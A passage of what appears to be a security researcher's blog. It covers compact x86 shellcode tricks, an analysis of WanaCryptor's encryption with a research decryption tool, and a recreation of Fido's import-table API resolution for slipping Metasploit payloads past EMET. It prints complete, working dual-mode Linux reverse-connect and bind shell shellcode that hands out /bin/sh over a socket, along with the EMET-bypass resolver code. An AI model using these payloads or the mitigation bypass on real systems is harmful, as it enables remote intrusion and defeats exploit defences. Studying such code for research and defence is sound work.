For example, the following code will allocate approx. 20KB of stack space in 4096-byte blocks.

; allocate 20KB using stack probe
    "\x31\xc9"             /* xor ecx, ecx        */
    "\xf7\xe1"             /* mul ecx             */
    "\xb1\x05"             /* mov cl, 0x5         */
    "\xb6\x10"             /* mov dh, 0x10        */

    "\x29\xd4"             /* sub esp, edx        */
    "\x85\x24\x24"         /* test [esp], esp     */
    "\xe2\xf9"             /* loop 0x8            */

The instruction ‘test [esp], esp‘ should trigger a kernel exception forcing expansion of stack accessible to the application. If the memory is unavailable, the program will raise an exception.

Testing registers

Many functions tend to return 1 for success (TRUE) or 0 for failure (FALSE).
Some will also return -1 or less than zero to indicate failure.

The best way to test for these values is by performing some operation on register that affects the status flags.

The main ones you’ll see used here are Zero Flag (ZF), Sign Flag (SF), Parity Flag (PF) and sometimes the Carry Flag (CF).

You can of course use the Overflow Flag (OF) too, but I don’t use it in examples here.

The Adjust Flag (AF) (also known as the Auxiliary Flag) can be used, but unfortunately doesn’t have a jump opcode associated with it.

You must load the flags into a register for testing using a PUSHFD/POP combination or using the one-byte instruction LAHF.

Testing for 0 or FALSE.

//
    "\x83\xf8\x00"         /* cmp eax, 0x0  */
    "\x74\x12"             /* jz 0x18       */

    "\x85\xc0"             /* test eax, eax */
    "\x74\x0e"             /* jz 0x18       */

    "\x09\xc0"             /* or eax, eax   */
    "\x74\x0a"             /* jz 0x18       */

    "\x21\xc0"             /* and eax, eax  */
    "\x74\x06"             /* jz 0x18       */

    "\x48"                 /* dec eax       */
    "\x78\x03"             /* js 0x18       */

    "\x91"                 /* xchg ecx, eax */
    "\xe3\x00"             /* jecxz 0x18    */

Testing for 1 or TRUE.

//
    "\x3c\x01"             /* cmp al, 0x1   */
    "\x75\x15"             /* jnz 0x24      */

    "\x66\x83\xf8\x01"     /* cmp ax, 0x1   */
    "\x75\x1e"             /* jnz 0x2a      */

    "\x83\xf8\x01"         /* cmp eax, 0x1  */
    "\x75\x19"             /* jnz 0x24      */

    "\x0f\xba\xe0\x00"     /* bt eax, 0x0   */
    "\x73\x0f"             /* jae 0x24      */

    "\x85\xc0"             /* test eax, eax */
    "\x7a\x0b"             /* jnp 0x24      */

    "\x09\xc0"             /* or eax, eax   */
    "\x7a\x07"             /* jnp 0x24      */

    "\x21\xc0"             /* and eax, eax  */
    "\x7a\x03"             /* jnp 0x24      */

    "\x48"                 /* dec eax       */
    "\x75\x00"             /* jnz 0x24      */

    "\xf7\xd8"             /* neg eax       */
    "\x78\x75"             /* js 0x7a       */

Testing for -1

I’ve often seen code that tests for -1 directly as shown in the first example, but it’s more efficient and compact to use the Sign Flag (SF) in 2nd example.

If operating in legacy mode, we can save a byte by incremeting the register and testing Zero Flag (ZF) instead.

Because ZF=1, PF=1 and SF=0 after the increment, you could alternatively use JP or JNS instead of JZ as shown in 3rd example.

If decrementing by 1 shown in the last example. SF=1, ZF=0, PF=0 so we can use JS, JNP, JNZ or JL.

//
    "\x83\xf8\xff"         /* cmp eax, 0xffffffff */
    "\x74\x2e"             /* jz 0x33             */

    "\x85\xc0"             /* test eax, eax       */
    "\x78\x2e"             /* js 0x32             */

    "\x40"                 /* inc eax            */
    "\x74\x16"             /* jz 0x1d            */

    "\x48"                 /* dec eax             */
    "\x78\x19"             /* js 0x22             */

The problem with last two for 64-bit mode is that there are no 1-byte instructions for INC/DEC as these are reserved for REX prefixes.

In that case, it’s better to use TEST or increment of an 8-bit register (if available) like AL for EAX/RAX. You could also just check AL for itself or -1 which is smaller too.

JLE can be used after a call to a BSD socket function like recv or send since it can return 0 or -1 on error.

// jump if <= 0
    "\x85\xc0"             /* test eax, eax       */
    "\x7e\x19"             /* jle 0x23            */

Testing for 0x80, 0x8000, 0x80000000

Performed usually to indicate overflow after doubling/multiplication by 2.

The flags set after a TEST instruction: PF=1, SF=1, ZF=0

Imagine a value to test is 0x80000000.

// jump if 0x80000000
    "\x85\xc0"             /* test eax, eax       */
    "\x78\x19"             /* js 0x23             */

We could also use INC EAX which sets SF=1, PF=0, OF=0 which allows us to use JS, JNP, JNO or JL

// jump if 0x80000000
    "\x40"                 /* inc eax             */
    "\x78\x19"             /* js 0x22             */

What if we use DEC EAX instead? This sets SF=0, PF=1, OF=1 which allows us to use JNS, JP, JO, or JG

// jump if 0x80000000
    "\x48"                 /* dec eax             */
    "\x79\x19"             /* jns 0x22            */

By adding 0x80000000, the result is zero setting ZF=1, OF=1, CF=1. Use JZ, JO or JC/JB
Subtraction will set ZF=1, OF=0, CF=0. Use JZ, JNO or JNC/JNB.

// jump if 0x80000000
    "\x01\xc0"             /* add eax, eax        */
    "\x74\x19"             /* jz 0x23             */

Instead of add or sub, shift left by 1

// jump if 0x80000000
    "\xd1\xe0"             /* shl eax, 1          */
    "\x74\x19"             /* jz 0x23             */

Using edx

// jump if 0x80000000
    "\x99"                 /* cdq                 */
    "\x42"                 /* inc edx             */
    "\x74\x0f"             /* jz 0x13             */

Sign extend using Shift Arithmetic Right (SAR)

; CF=1, ZF=1, SF=0 for <  0x80000000
; CF=0, ZF=0, SF=1 for >= 0x80000000

"\xc1\xf8\x1f"         /* sar eax, 0x1f       */
"\x78\x5b"             /* js 0x60             */

Using the negate instruction which doesn’t alter the register.

; CF=1, ZF=0, SF=1, OF=1, PF=1 if eax == 0x80000000
"\xf7\xd8"             /* neg eax             */
"\x72\x38"             /* jb 0x3c             */
"\x78\x36"             /* js 0x3c             */
"\x75\x34"             /* jnz 0x3c            */
"\x70\x32"             /* jo 0x3c             */
"\x7a\x30"             /* jp 0x3c             */

Conditional jumps / Control flow

This involves performing what you might do in higher level languages using FOR, WHILE and DO/WHILE statements.

The NOP instructions are only filler material, taking the place of something otherwise useful.

Normally, I’d try use ECX if it’s free along with a LOOP instruction, but it really depends on the situation.

Looping 2 times

// Parity Flag

    "\x31\xc0"             /* xor eax, eax  */
    "\x90"                 /* nop           */
    "\x90"                 /* nop           */
    "\x48"                 /* dec eax       */
    "\x7a\xfb"             /* jp 0x3        */

// Sign Flag

    "\x31\xc0"             /* xor eax, eax  */
    "\x90"                 /* nop           */
    "\x90"                 /* nop           */
    "\x04\x40"             /* add al, 0x40  */
    "\x79\xfa"             /* jns 0x3       */

// Zero Flag

    "\x31\xc0"             /* xor eax, eax  */
    "\x90"                 /* nop           */
    "\x90"                 /* nop           */
    "\x04\x80"             /* add al, 0x80  */
    "\x75\xfa"             /* jnz 0x3       */

Another way to loop twice if all your registers are used up is using the carry flag.
We clear it first (if not already) save the flags on stack, execute our code, restore flags, complement and loop again.

// using the carry flag
    "\xf8"                 /* clc                 */
    "\x9c"                 /* pushfd              */
    "\x90"                 /* nop                 */
    "\x90"                 /* nop                 */
    "\x9d"                 /* popfd               */
    "\xf5"                 /* cmc                 */
    "\x72\xf9"             /* jb 0x2              */

Looping 3 times

For PF, set a register to zero and increment by 1 until PF=1.
For SF, set a register to zero and increment by a number between 43 and 63 until SF=1.
For ZF, set a register to one and increment by 85 until ZF=1

// Parity Flag

    "\x31\xc0"             /* xor eax, eax  */
    "\x90"                 /* nop           */
    "\x90"                 /* nop           */
    "\x40"                 /* inc eax       */
    "\x7b\xfb"             /* jnp 0x3       */

// Sign Flag

    "\x31\xc0"             /* xor eax, eax  */
    "\x90"                 /* nop           */
    "\x90"                 /* nop           */
    "\x04\x30"             /* add al, 0x30  */
    "\x79\xfa"             /* jns 0x3       */

// Zero Flag

    "\x6a\x01"             /* push 0x1      */
    "\x58"                 /* pop eax       */
    "\x90"                 /* nop           */
    "\x90"                 /* nop           */
    "\x04\x55"             /* add al, 0x55  */
    "\x75\xfa"             /* jnz 0x4       */

You may also point out that we can simply set EAX to 3 and decrease until zero, which is true.

// Zero Flag
    "\x6a\x03"             /* push 0x3            */
    "\x58"                 /* pop eax             */
    "\x90"                 /* nop                 */
    "\x90"                 /* nop                 */
    "\x48"                 /* dec eax             */
    "\x75\xfb"             /* jnz 0x4             */

And if ECX is free, we can simply use LOOP

// ECX
    "\x6a\x03"             /* push 0x3            */
    "\x59"                 /* pop ecx             */
    "\x90"                 /* nop                 */
    "\x90"                 /* nop                 */
    "\xe2\xfc"             /* loop 0x4            */

Whenever ECX is free, use LOOP.

If we can’t use ECX, set AL to -1 and use subtraction which saves us a byte compared with 2nd example. You could also set AL to 1 if you wanted to use addition instead.

// Zero Flag
    "\x0c\xff"             /* or al, 0xff         */
    "\x90"                 /* nop                 */
    "\x90"                 /* nop                 */
    "\x2c\x55"             /* sub al, 0x55        */
    "\x75\xfa"             /* jnz 0x3             */

Looping 4 times

This is a little easier since 256 is divisible evenly by 4 for ZF, 128 for SF.

// Sign

    "\x31\xc0"             /* xor eax, eax        */
    "\x90"                 /* nop                 */
    "\x90"                 /* nop                 */
    "\x04\x20"             /* add al, 0x20        */
    "\x79\xfa"             /* jns 0x3             */

// Zero

    "\x31\xc0"             /* xor eax, eax        */
    "\x90"                 /* nop                 */
    "\x90"                 /* nop                 */
    "\x04\x40"             /* add al, 0x40        */
    "\x75\xfa"             /* jnz 0x3             */

You could go on and on with this, but you should grasp from the above examples how to write your own.

The last part of control flow involves implementing conditional calls using relative offsets. Imagine a situation where based on the result of a call to another function, you want to invoke a fake function to confuse some analysis of the code. This is very basic of course.

This only tests for TRUE or FALSE condition, but it would be trivial to test for -1 or a signed value < 0

Character conversions

There are times you might want to convert a string from lowercase to uppercase and vice versa. There are also times you’ll want conversion from unicode to ansi, although the code shown here for that will only cover latin alphabets.

Upper/Lowercase

Converting case is simply a matter of toggling a bit on and off. Look at the following characters and their binary values.

a = 01100001 A = 01000001
b = 01100010 B = 01000010
c = 01100011 C = 01000011

For lowercase, bit 5 is set. (i’m counting from 0).
If you’re positive the string is only lowercase or only uppercase, then using an XOR will flip the case.

// flip the case
    "\x34\x20"             /* xor al, 0x20             */

If you want all lowercase without having to compare each byte, just use OR

// convert to lowercase
    "\x0c\x20"             /* or al, 0x20              */

For uppercase, use AND with 0xDF to zero out bit 5. The only problem is that it will screw up digits or other characters that don’t have a lowercase equivilent.

// convert to uppercase
    "\x24\xdf"             /* and al, 0xdf             */

Of course, you can also use BTS to set it to lowercase, but it requires more bytes.

// set to lowercase
    "\x0f\xba\xe8\x05"     /* bts eax, 0x5             */

Or if you’re just flipping the case, BTR

// flip case
    "\x0f\xba\xf0\x05"     /* btr eax, 0x5             */

What happens if you have digits in the string or some other special characters? I’ve used lowercase conversions for shellcode instead of uppercase, because the latter requires conditional jumps and it’s not really required.

Take for example the metasploit code block_api.asm

Converting the string to lowercase, you could use the following. Bear in mind, this is reading information about DLL from InLoadOrderLinks which is different to what Metasploit reads.

;
    movzx  ecx, word[edi+44]  ; len = BaseDllName.Length
    mov    esi, [edi+48]      ; str = BaseDllName.Buffer
    shr    ecx, 1             ; len /= 2
    xor    eax, eax           ; c = 0
    cdq                       ; h = 0
hash_dll:                     ; do {
    lodsw                     ;   c = *str++
    or     al, 0x20           ;   c = tolower(c)
    ror    edx, 13            ;   h = ROTR32(h, 13) 
    add    edx, eax           ;   h += c
    loop   hash_dll           ; while (--len)

You couldn’t just plug this into the existing metasploit code of course because the hashes generated would be completely different. It’s just to demonstrate another approach.

If you set bit 5 using OR for digits 0-9, nothing changes since bit 5 is already set for those values.

The same is true for periods which separate module name from extension, like KERNEL32.DLL will simply be converted to kernel32.dll using OR without the need for conditional jumps.

But if converting to uppercase using SUB instruction, you need conditional jumps.

Ansi and Unicode

okay, this is not strictly unicode conversion since we’re only using latin alphabets.
Unicode strings end with 2 null bytes so this should terminate once null byte reached.

; esi = unicode in
   ; edi = ansi out
uni2ans:
   movsb             ; convert it to asciiz format
   dec   edi
   cmpsb
   jnz   uni2ans

Acknowledgements

There’s a lot of people who helped write this post indirectly through sharing their knowledge and ideas. Some who have inspired code shown here include:

drizz, r!sc, d0ris, jb, Z0MBiE, WiteG, Vecna, Mental Driller, GriYo, JPanic, Qkumba/Peter Ferrie, Jacky Qwerty, Super, hh86, benny and any others I forgot.

Posted in assembly, programming, shellcode | Tagged , , , , | Leave a comment

WanaCryptor File Encryption and Decryption

Introduction

This is a quick post about the WanaCryptor ransomware wreaking havoc on many networks across the world this weekend. With all the news coverage, most of you already know the trouble caused by it.

Once executed on a system, it will use the RSA and AES cryptographic algorithms to encrypt files before demanding payment in exchange for a key necessary to recover those files. If you want to understand the RSA cryptosystem, please read here since all the talk about public and private keys might be confusing to some readers at first.

WanaFork

The source code provided along with this post is intended primarily for security researchers who wish to understand the encryption and decryption process, which may help with recovery of files in the event authors of ransomware decide to release their private key.

There’s no discussion here on any behavior of the ransomware except the encryption/decryption process so if you want information about something else, have a look at this file here which was compiled by various security researchers in the #wannadecryptor channel on Freenode IRC servers.

For the source code to wanafork, see sources in C here. It’s only been compiled with MSVC and tested on Windows, although MINGW should compile it ok, provided it’s a recent version.

Encryption Process

Each system generates an RSA key pair of 2048-bits using the CryptGenKey API which is part of the Microsoft Crypto API (CAPI).

The public key is stored in 00000000.pky using CryptExportKey
The private key is stored in 00000000.eky using CryptExportKey but is also encrypted before storage using CryptEncrypt API with the master public key embedded inside the DLL responsible for encrypting files on disk.

This encryption of private key is what prevents recovery of files without assistance from the ransomware authors.

For each file encrypted, CryptGenRandom API is used to derive a 16-byte value which is used with AES-128 in CBC mode to encrypt the data.

The AES key is encrypted with the users public key and stored along with AES ciphertext.

The only way to recover this AES key and thus the contents of encrypted files is through decryption using the private key and we need the master private key to do this.

Ransom payment process

Although I haven’t researched this at all, it seems reasonable to make some assumptions based on the encryption model that some component of the ransomware sends the encrypted private key stored in 00000000.eky to a server over the TOR network where it’s decrypted by the ransomware authors using their master private key.

The decrypted private key is then sent back to the victim’s system and stored as 00000000.dky which allows @WanaDecryptor@.exe to recover files.

Open to correction of course. It has been pointed out by some that there’s no way for the ransomware authors to identify who makes a payment.

Because of the algorithm used, it isn’t feasible to recover data from encrypted files without assistance from the ransomware authors.

The rest of post may only be of interest to developers / researchers.

Definitions

You’ll see these values throughout the source code shown here.

WanaCryptor Archive Structure

Each encrypted file or what I call archive, has a predefined structure necessary for successful decryption.

  • Signature
  • 64-bit signature. Currently set to the string “WANACRY!

  • Key Length
  • Indicates length in bytes of the following encrypted AES key.

  • Encrypted AES key
  • 128-bit AES key encrypted using the users RSA public key stored in 00000000.pky
    This key is generated by CryptGenRandom.

  • Unknown 32-bit value
  • I’m unsure what this is for yet. It’s usually set to 3 or 4

  • File Length
  • 64-bit value obtained from GetFileSizeEx which indicates the original size of file.

  • Ciphertext
  • Encrypted data using AES-128 in CBC mode. Uses zero padding.

The following is a structured hex dump of encrypted file generated by the malware.

RSA Key Generation

As said, the RSA keys generated are unique to each system.

In the tool, both public + private keys are exported in their plaintext form. The private key is also encrypted for illustrating how the malware does it.

AES Key Generation

The AES keys for each file are generated using CryptGenRandom API which is cryptographically secure and therefore invulnerable to attack.

When decrypting an archive, we need to decrypt the encrypted AES key using the RSA private key blob stored in 00000000.dky

In both scenarios, because I’m using Crypto API for AES, additional steps are required to import the key into a CAPI key object.

I’d guess using a custom AES was probably easier to use than Crypto API, but that’s just speculation on my part.

Encryption

WanaCryptor uses Zero Padding, but Crypto API doesn’t support it.

Rather than set the bFinalize flag to TRUE when encrypting final block, the buffer should be aligned by 16 bytes and padded with null bytes. The bFinalize flag should remain FALSE in order to be compatible with WanaCryptor.

Here’s an example of creating a WanaCryptor archive and using Crypto API to perform AES-128-CBC encryption of file data.

Decryption

As with Encryption, the bFinalize flag (if using Crypto API) should always be FALSE. This is because Microsoft Crypto CSPS don’t support zero padding.

Summary

Without the master private key generated by the authors, it’s not possible to recover data from encrypted files unless by miracle someone discovers a flaw with either AES or RSA.

Thanks to 0x4d_ for helping with post and all the folks on freenode for researching this malware over the weekend.

This tool will require a lot more testing before it can be considered reliable and the only reason for releasing it early is so that others can study the source and write their own decryption tools.

Posted in cryptography, encryption, malware, public key exchange, security, windows | Tagged , , , , , , , , | 8 Comments

Shellcode: Dual Mode (x86 + x86-64) Linux shellcode

Introduction

Someone asked me recently what do you mean by “dual mode shellcode”? and it seems the wording is slightly ambiguous to those unfamiliar with the different operating modes of a CPU like x86 so I just wanted to clarify through some codes written for Linux.

All “dual mode” means is that the shellcode will run successfully in either legacy mode (32-bit) or long mode (64-bit) and that’s it.

You can’t really call them multiplatform because they only run on Linux and you can’t call them multi-architecture because they only run on the x86 cpu.

So I propose calling them “dual mode” or x84 but feel free to call ’em whatever you want.

They work by exploiting x86 REX prefixes like the dual mode code for windows shown here

x86-64 Linux shellcodes were documented last year and here are some dual mode versions.

The sources below are using 32-bit instructions to provide some clarity but will also run successfully in 64-bit mode.

Execute /bin/sh

sh

Reverse Connect Shellcode

; 128 byte reverse connect shell
;
; Tested on 32 and 64-bit versions of Linux
;

    bits    32
    
    ; sa.sin_family = AF_INET;
    ; sa.sin_addr   = inet_addr("127.0.0.1");
    ; sa.sin_port   = htons(1234);
    mov     eax, ~0xD2040002 & 0xFFFFFFFF 
    mov     ebx, ~0x0100007f & 0xFFFFFFFF 
    not     eax
    not     ebx
    ; create space for sa
    push    eax
    push    eax
    push    esp
    pop     edi
    stosd
    xchg    eax, ebx
    stosd
    push    esp         ; &sa
    
    ; step 1, create a socket
    ; x64: socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    ; x86: socketcall(SYS_SOCKET, {AF_INET, SOCK_STREAM, IPPROTO_IP});
    xor     eax, eax    ; eax = 0
    cdq                 ; rdx = IPPROTO_IP
    mov     al, 103     ; eax = sys_socketcall
    push    1
    pop     esi         ; rsi = SOCK_STREAM
    push    2
    pop     edi         ; rdi = AF_INET    
    dec     eax
    jnz     x86_socket  ; jump to x86
    mov     al, 41      ; rax = sys_socket
    syscall
    
    xchg    eax, edi    ; edi = s
    xchg    eax, esi    ; esi = 2
    
    ; step 2, assign socket handle to stdin,stdout,stderr
    ; dup2 (s, STDIN_FILENO)
    ; dup2 (s, STDOUT_FILENO)
    ; dup2 (s, STDERR_FILENO)
x64_dup2:
    mov     al, 33      ; rax = sys_dup2
    syscall
    sub     esi, 1      ; watch out for that bug 😉
    jns     x64_dup2    ; jump if not signed
    
    ; step 3, connect to remote host
    ; connect (s, &sa, sizeof(sa));
    pop     esi         ; rsi = &sa
    mov     dl, 16      ; rdx = sizeof(sa)
    mov     al, 42      ; rax = sys_connect
    syscall    
    jmp     x84_execve

x86_socket:
    pop     ebp         ; ebp = &sa
    push    esi         ; save 1
    pop     ebx         ; ebx = SYS_SOCKET
    push    edx         ; IPPROTO_IP
    push    ebx         ; SOCK_STREAM
    push    edi         ; AF_INET
    push    esp             
    pop     ecx         ; ecx = &args 
    int     0x80

    xchg    eax, ebx    ; ebx = s
    
    ; step 2, assign socket to stdin, stdout, stderr
    ; dup2 (s, STDIN_FILENO)
    ; dup2 (s, STDOUT_FILENO)
    ; dup2 (s, STDERR_FILENO)    
    pop     ecx         ; ecx = 2
x86_dup2:
    mov     al, 63      ; eax = sys_dup2
    int     0x80 
    dec     ecx
    jns     x86_dup2    ; jump if not signed
    
    ; step 3, connect to remote host
    ; socketcall (SYS_CONNECT, {s, &sa, sizeof(sa)});
    push    16          ; sizeof(sa) 
    push    ebp         ; &sa
    push    ebx         ; s
    push    esp
    pop     ecx         ; &args
    push    3
    pop     ebx         ; ebx = sys_connect
    mov     al, 102     ; eax = sys_socketcall    
    int     0x80
    
    ; execve("/bin//sh", NULL, NULL);
x84_execve:
    cdq                 ; envp = NULL
    xor     esi, esi    ; argv = NULL
    push    eax         ; '\0'
    push    eax         ; null space
    push    eax         ; null space
    push    esp
    pop     ebx         ; ebx = "/bin//sh", 0
    push    ebx         ; save pointer to "/bin//sh", 0
    pop     edi         ; rdi = "/bin//sh", 0
    mov     dword[edi+0], '/bin'
    mov     dword[edi+4], '//sh'
    inc     eax
    jnz     x86_execve
    mov     al, 59      ; rax = sys_execve
    syscall
x86_execve:
    xor     ecx, ecx    ; argv = NULL
    mov     al, 11      ; eax  = sys_execve
    int     0x80

Bind Shellcode

; 156 byte bind shell
;
; Tested on 32 and 64-bit versions of Linux
;

    bits 32

    ; sa.sin_family = AF_INET;
    ; sa.sin_addr   = INANY_ADDR;
    ; sa.sin_port   = htons(1234);
    mov     eax, ~0xD2040002 & 0xFFFFFFFF 
    mov     ebx, ~0x00000000 & 0xFFFFFFFF 
    not     eax
    not     ebx
    ; create space for sa
    push    eax
    push    eax
    push    esp
    pop     edi
    stosd
    xchg    eax, ebx
    stosd
    push    esp         ; &sa
    pop     ebp
    
    ; step 1, create a socket
    ; x64: socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    ; x86: socketcall(SYS_SOCKET, {AF_INET, SOCK_STREAM, IPPROTO_IP});
    xor     eax, eax    ; eax = 0
    cdq                 ; rdx = IPPROTO_IP
    mov     al, 103     ; eax = sys_socketcall
    push    1
    pop     esi         ; rsi = SOCK_STREAM
    push    2
    pop     edi         ; rdi = AF_INET    
    dec     eax
    jnz     x86_socket  ; jump to x86
    mov     al, 41      ; rax = sys_socket
    syscall
    
    xchg    eax, edi    ; edi=s
    
    ; step 2, bind to port 1234 
    ; bind(s, {AF_INET,1234,INADDR_ANY}, 16)
    push    ebp
    pop     esi
    mov     dl, 16
    mov     al, 49
    syscall
    
    ; step 3, listen
    ; listen(s, 0);
    push    eax
    pop     esi
    mov     al, 50
    syscall
    
    ; step 4, accept connections
    ; accept(s, 0, 0);
    mov     al, 43
    syscall
    
    xchg    eax, edi         ; edi=s
    xchg    eax, esi         ; esi=2
    
    ; step 5, assign socket handle to stdin,stdout,stderr
    ; dup2(r, fileno);
dup_loop64:
    mov     al, 33               ; rax=sys_dup2
    syscall
    sub     esi, 1
    jns     dup_loop64       ; jump if not signed   
    jmp     x84_execve
    
x86_socket:
    push    esi         ; save 1
    pop     ebx         ; ebx = SYS_SOCKET
    push    edx         ; IPPROTO_IP
    push    ebx         ; SOCK_STREAM
    push    edi         ; AF_INET
    push    esp             
    pop     ecx         ; ecx = &args 
    int     0x80

    xchg    eax, edi    ; ebx = s

    ; step 2, bind to port 1234
    ; bind (s, &sa, sizeof(sa))
    pop    ebx               ; ebx=2, sys_bind
    pop    esi               ; esi=1
    push   0x10              ; sizeof(sa)
    push   ebp               ; &sa
    push   edi               ; s
    mov    al, 0x66          ; eax=sys_socketcall
    mov    ecx, esp          ; ecx=&args
    int    0x80
    
    mov    [ecx+4], edx      ; clear sa from args
    
    ; step 3, listen for incoming connections
    ; listen (s, 0);
    mov    al, 0x66          ; eax=sys_socketcall
    mov    bl, 4             ; ebx=sys_listen
    int    0x80
    
    ; step 4, accept connections
    ; accept (s, 0, 0);
    mov    al, 0x66          ; eax=sys_socketcall
    inc    ebx               ; ebx=sys_accept
    int    0x80
    
    ; step 5, assign socket to stdin, stdout and stderr
    ; dup2(s, FILENO_STDIN); 
    ; dup2(s, FILENO_STDOUT); 
    ; dup2(s, FILENO_STDERR); 
    push   2
    pop    ecx               ; ecx=2
    xchg   ebx, eax          ; ebx=s
dup_loop:
    mov    al, 0x3f           ; eax=sys_dup2
    int    0x80
    dec    ecx
    jns    dup_loop

    ; execve("/bin//sh", NULL, NULL);
x84_execve:
    cdq                 ; envp = NULL
    xor     esi, esi    ; argv = NULL
    push    eax         ; '\0'
    push    eax         ; null space
    push    eax         ; null space
    push    esp
    pop     ebx         ; ebx = "/bin//sh", 0
    push    ebx         ; save pointer to "/bin//sh", 0
    pop     edi         ; rdi = "/bin//sh", 0
    mov     dword[edi+0], '/bin'
    mov     dword[edi+4], '//sh'
    inc     eax
    jnz     x86_execve
    mov     al, 59      ; rax = sys_execve
    syscall
x86_execve:
    xor     ecx, ecx    ; argv = NULL
    mov     al, 11      ; eax  = sys_execve
    int     0x80

Summary

I’ve uploaded code to exploit-db in event my blog goes offline for any reason. The sources are also in github repo here

Posted in assembly, linux, programming, security, shellcode | Tagged , , , , , | Leave a comment

Shellcode: Fido and how it resolves GetProcAddress and LoadLibraryA

Introduction

A tool to modify existing metasploit payloads for windows called Fido was recently published by Joshua Pitts, the author of Backdoor Factory.

Fido will strip this assembly code responsible for resolving API addresses in the export directory and replace it with 1 of 4 methods that obtain GetProcAddress and LoadLibraryA from the Import directory.

The upgrade enables existing payloads from Metasploit to bypass Enhanced Mitigation Experience Toolkit (EMET) which for those of you who don’t know defends against memory corruption vulnerabilities on legacy systems that do not support Control Flow Guard (CFG)

Due to the Export Address Table (EAT) Access Filtering (EAF) feature in EMET and overall popularity of Metasploit payloads for exploiting vulnerabilities, detection is not difficult hence the motivation behind writing Fido.

As Joshua points out in his presentation, EMET will reach end of life (EOL) on July 31st 2018, by which time Microsoft probably expects most applications to be protected by CFG which is a much more advanced protection against memory corruption vulnerabilities.

Perhaps it’s an optimistic projection developers will migrate to MSVC 2015 just to benefit from CFG but only time will tell.

Here, I’ve recreated in C and x86 assembly the ideas presented by Joshua, mainly to understand what Fido assembly code does and also to try optimize the examples to be more compact.

Some of the code shown here is derived from IAT code shown in Resolving API addresses in memory but won’t use hashes except for the last 2 when searching for external DLL.

So there are 4 options provided by the Fido tool:

Type Description
GPA GPA is in targetbinary IAT (default)
LLAGPA LoadlibraryA(LLA)/GPA is in the targetbinary IAT (smallest shellcode option)
Extern GPA need DLLName or targetbinary to use
Extern LLAGPA need DLLName or targetbinary to use

So let’s examine each approach with both C and assembly code.

GPA

If the executable image being exploited imports GetProcAddress already, we just need to access the address from kernel32.dll which should be in the Import Address Table (IAT).

A bit of trivia for you: Locating GetProcAddress in IAT was used in a Win32 computer virus called Cabanas by Jacky Qwerty/29A… published 20 years ago!

get_proc_address

gpa.c here

// locate kernel32.dll
  for (;imp->Name!=0;imp++) 
  {
    dll = RVA2VA(PDWORD, base, imp->Name);
    if ((dll[0] | 0x20202020) == 'nrek' && 
        (dll[1] | 0x20202020) == '23le')
    { 
      // now locate GetProcAddress
      rva   = imp->OriginalFirstThunk;
      oft   = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
      
      rva   = imp->FirstThunk;
      ft    = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
        
      for (gpa=NULL;; oft++, ft++) 
      {
        rva  = oft->u1.AddressOfData;
        ibn  = (PIMAGE_IMPORT_BY_NAME)RVA2VA(ULONG_PTR, base, rva);
        name = (PDWORD)ibn->Name;
        
        // is this GetProcAddress?
        if (name[0] == 'PteG' && name[2] == 'erdd') {
          gpa = (LPVOID)ft->u1.Function;
          break;
        }
      }
    }
  }

The assembly code doesn’t have any bounds checking although it would be trivial enough to enable. We only check for ordinals and skip those to avoid crashing during the compare for GetProcAddress string.

The DLL name is converted to lowercase using 0x20202020 which may or may not be required. It assumes GetProcAddress is imported by the executable module and that it’s imported from kernel32.dll.

; returns pointer to GetProcAddress in ebp
    push   esi
    push   edi
    push   ebx
    
    push   30h
    pop    edx
    mov    ebx, [fs:edx]      ; ebx = peb
    mov    ebx, [ebx+08h]     ; ebx = ImageBaseAddress
    add    edx, [ebx+3ch]     ; edx += e_lfanew
    mov    esi, [ebx+edx+50h]
    add    esi, ebx
imp_l0:
    lodsd                   ; OriginalFirstThunk +00h
    xchg   eax, ebp         ; store in ebp
    lodsd                   ; TimeDateStamp      +04h
    lodsd                   ; ForwarderChain     +08h
    lodsd                   ; Name               +0Ch
    xchg   eax, edx
    lodsd                   ; FirstThunk         +10h 
    xchg   eax, edi         ; store in edi
    
    mov    eax, [edx+ebx]
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'kern'
    jnz    imp_l0           ; get next DLL if not equal
    
    mov    eax, [edx+ebx+4]
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'el32'
    jnz    imp_l0           ; get next DLL if not equal
    
    lea    esi, [ebp+ebx]   ; esi = OriginalFirstThunk
    add    edi, ebx         ; edi = FirstThunk
imp_l1:
    lodsd                   ; eax = oft->u1.Function, oft++;
    scasd                   ; ft++;
    test   eax, eax
    js     imp_l1           ; skip ordinals 
    
    cmp    dword[eax+ebx+2], 'GetP'
    jnz    imp_l1
    
    cmp    dword[eax+ebx+10], 'ddre'
    jnz    imp_l1
    
    mov    ebp, [edi-4]     ; ebp = ft->u1.Function
    
    pop    ebx
    pop    edi
    pop    esi
    ret

LLAGPA

The next bit of code resolves address of both LoadLibraryA and GetProcAddress from kernel32.dll assuming the image imports both.

llagpa.c here

LPVOID get_imp(PIMAGE_IMPORT_DESCRIPTOR imp, 
    LPVOID base, PDWORD api)
{
  PDWORD                   name;
  LPVOID                   api_adr;
  PIMAGE_THUNK_DATA        oft, ft;
  PIMAGE_IMPORT_BY_NAME    ibn;
  DWORD                    rva;
  
  rva   = imp->OriginalFirstThunk;
  oft   = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
  
  rva   = imp->FirstThunk;
  ft    = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
    
  for (;; oft++, ft++) 
  {
    // no API left?
    if (oft->u1.AddressOfData==0) break;
    // skip ordinals
    if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) continue;
    
    rva  = oft->u1.AddressOfData;
    ibn  = (PIMAGE_IMPORT_BY_NAME)RVA2VA(ULONG_PTR, base, rva);
    name = (PDWORD)ibn->Name;
    
    // have we a match?
    if (name[0] == api[0] && name[1] == api[1]) {
      api_adr = (LPVOID)ft->u1.Function;
      break;
    }
  }
  return api_adr;  
}

Then the code which calls get_imp()

// locate kernel32.dll
  for (;imp->Name!=0;imp++) 
  {
    dll = RVA2VA(PDWORD, base, imp->Name);
    if ((dll[0] | 0x20202020) == 'nrek' && 
        (dll[1] | 0x20202020) == '23le')
    { 
      // now locate GetProcAddress and LoadLibraryA
      lla = get_imp(imp, base, (PDWORD)"LoadLibraryA");
